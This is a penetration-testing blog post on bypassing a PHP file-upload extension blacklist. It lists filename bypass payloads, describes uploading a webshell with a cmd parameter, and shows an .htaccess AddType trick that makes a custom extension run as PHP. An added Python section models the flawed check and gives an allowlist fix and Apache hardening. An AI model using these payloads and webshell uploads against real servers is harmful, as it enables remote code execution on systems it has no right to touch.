Connection between .htaccess and file upload bypass

PHP File Upload Bypass

This post covers a PHP file upload bypass and the role the .htaccess file plays in turning it into code execution.

I came across a web application with an upload function for attaching a file to a ticket. The application was built in PHP, and further enumeration turned up the uploads folder that holds the uploaded files. The application's validation, however, blocked uploads with any of the potentially dangerous extensions listed below.

[ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .phar and .inc ]

Bypassing file extension checks

I came across the nice article on file upload bypasses linked at the end of this post and put together a curated list of all the variants, to run through Burp Intruder and see whether anything got past the check.

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

Luckily, the name file.php... (three dots after the extension) got past the upload restriction, and I found file.php inside the uploads directory, so the trailing dots were stripped when the file was written to disk. This confirmed that the extension check could be bypassed. I then uploaded the simple PHP backdoor that ships with Kali (/usr/share/webshells/php/simple-backdoor.php).

Uploading our simple PHP backdoor

From here it is straightforward: we get command execution by requesting the file from the uploads directory (simple-backdoor.php takes the command in the cmd query parameter, e.g. /uploads/file.php?cmd=id).

RCE via File Upload

Using .htaccess

It turned out that users could also upload .htaccess files, and we can take advantage of this to get code execution. The .htaccess file is not an RCE vector by itself, but it lets us map a new, otherwise harmless extension onto the PHP handler, so an extension the application happily accepts becomes executable. This only works because Apache honours per-directory .htaccess files in the uploads folder; with AllowOverride None (or without the FileInfo override, which AddType and AddHandler need) the uploaded .htaccess would simply be ignored.

Now we can define our own PHP extension and register it via the .htaccess file.

Our .htaccess file then looks like:

AddType application/x-httpd-php .rce

Now we upload a file named shell.rce containing the simple-backdoor.php script; within that directory Apache treats it as PHP, and we get the same RCE as before. Note that AddType application/x-httpd-php relies on mod_php: a server that runs PHP through php-fpm maps extensions to PHP with a SetHandler/proxy directive instead, so the directive has to be adjusted to match the target's setup.
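As an added example (not code from the original post or from the application it describes), the following Python models the blacklist extension check described above, generates the same kind of Intruder candidates as the list earlier in the post, and shows an allowlist check that rejects the trailing-dot name, the double extension, shell.rce and the .htaccess upload. The helper names, the image/PDF allowlist, and the assumption that the host strips trailing dots the way Windows does are mine, not the post's.

```python
"""Added example, not code from the original post: models the blacklist
extension check the post bypassed, generates the same kind of Burp
Intruder candidates, and shows an allowlist check that closes the gap
(including the .htaccess upload). Names and helpers here are assumptions
made for the example; the post does not show the application's code."""
import re
import secrets
from typing import List, Optional, Tuple

# Extensions the post says the application rejected.
BLACKLIST = {".php", ".php2", ".php3", ".php4", ".php5", ".php6", ".php7",
             ".phps", ".pht", ".phtm", ".phtml", ".pgif", ".shtml", ".phar", ".inc"}

# Assumed for the hardened check: a ticket attachment should only be one of these.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".pdf"}

# Stem plus exactly one extension, no leading dot (rejects .htaccess),
# no spaces, slashes, NUL bytes or percent sequences.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")


def naive_extension(name: str) -> str:
    """Text after the last dot, like PHP's pathinfo(..., PATHINFO_EXTENSION)."""
    dot = name.rfind(".")
    return "" if dot == -1 else name[dot + 1:]


def blacklist_check(name: str) -> bool:
    """The vulnerable check as the post describes it: True means accepted.
    'file.php....' has an empty last extension, so it is never on the list."""
    return "." + naive_extension(name).lower() not in BLACKLIST


def stored_name(name: str) -> str:
    """Approximation of what lands on disk on a Windows host (assumption: the
    post does not name the OS, but finding file.php after uploading file.php....
    is consistent with NTFS stripping trailing dots and spaces). A Linux host
    would keep the name verbatim."""
    return name.rstrip(". ")


def bypass_candidates(stem: str = "file", ext: str = "php", decoy: str = "png") -> List[str]:
    """The Intruder payload list from the post, generalised to any stem, target
    extension and decoy extension. Percent sequences stay encoded so the HTTP
    layer decides whether they are decoded."""
    base = f"{stem}.{ext}"
    mixed = "".join(c.upper() if i % 2 else c for i, c in enumerate(ext))  # php -> pHp
    return [
        base + "%20", base + "%0a", base + "%00", base + "%0d%0a",
        base + "/", base + ".\\", f"{stem}.", base + "....",
        f"{stem}.{mixed}....", f"{stem}.{decoy}.{ext}", f"{stem}.{decoy}.{mixed}",
        base + f"%00.{decoy}", base + f"\x00.{decoy}",  # second one carries a raw NUL byte
        base + f"%0a.{decoy}", base + f"%0d%0a.{decoy}", base + f"Junk123{decoy}",
    ]


def triage(names: List[str]) -> List[Tuple[str, bool, str, bool]]:
    """For each candidate: (name, passes the blacklist, name on disk,
    ends up with a PHP extension on disk)."""
    rows = []
    for n in names:
        on_disk = stored_name(n)
        rows.append((n, blacklist_check(n), on_disk,
                     "." + naive_extension(on_disk).lower() in BLACKLIST))
    return rows


def allowlist_check(name: str) -> Optional[str]:
    """Hardened check: returns the lowercase extension to store under, or None
    to reject. Normalises before deciding, so the trailing-dot trick, double
    extensions, dotfiles such as .htaccess and shell.rce all fail."""
    name = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path component
    name = stored_name(name)                             # judge the name the filesystem will keep
    if not SAFE_NAME.fullmatch(name):
        return None
    ext = "." + naive_extension(name).lower()
    return ext if ext in ALLOWLIST else None


def storage_name(ext: str) -> str:
    """Never reuse the client's name: random stem plus the vetted extension."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, passed, on_disk, php in triage(bypass_candidates()):
        print(f"{name!r:28} blacklist={'pass' if passed else 'reject'} "
              f"on_disk={on_disk!r} php_on_disk={php} allowlist={allowlist_check(name)}")
    for name in (".htaccess", "shell.rce"):
        print(f"{name!r:28} blacklist={'pass' if blacklist_check(name) else 'reject'} "
              f"allowlist={allowlist_check(name)}")
```

The triage rows show why file.php.... passes: its last "extension" is empty, so it is never on the blacklist, while the name on disk ends in .php. The same check also waves through .htaccess and shell.rce, because neither extension is on the list. The fix is to normalise first and allowlist second, store under a server-generated name, and, independently of the upload code, stop Apache from honouring uploaded .htaccess files (AllowOverride None for the uploads directory in the main server config) and from executing anything in that directory (php_admin_flag engine off under mod_php, or removing the PHP handler for that location), so that a bypass of the upload check alone no longer yields code execution.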

The article below gives a more in-depth analysis of file upload bypasses; it is definitely worth a read.

File-Upload Bypass https://thibaud-robin.fr/articles/bypass-filter-upload/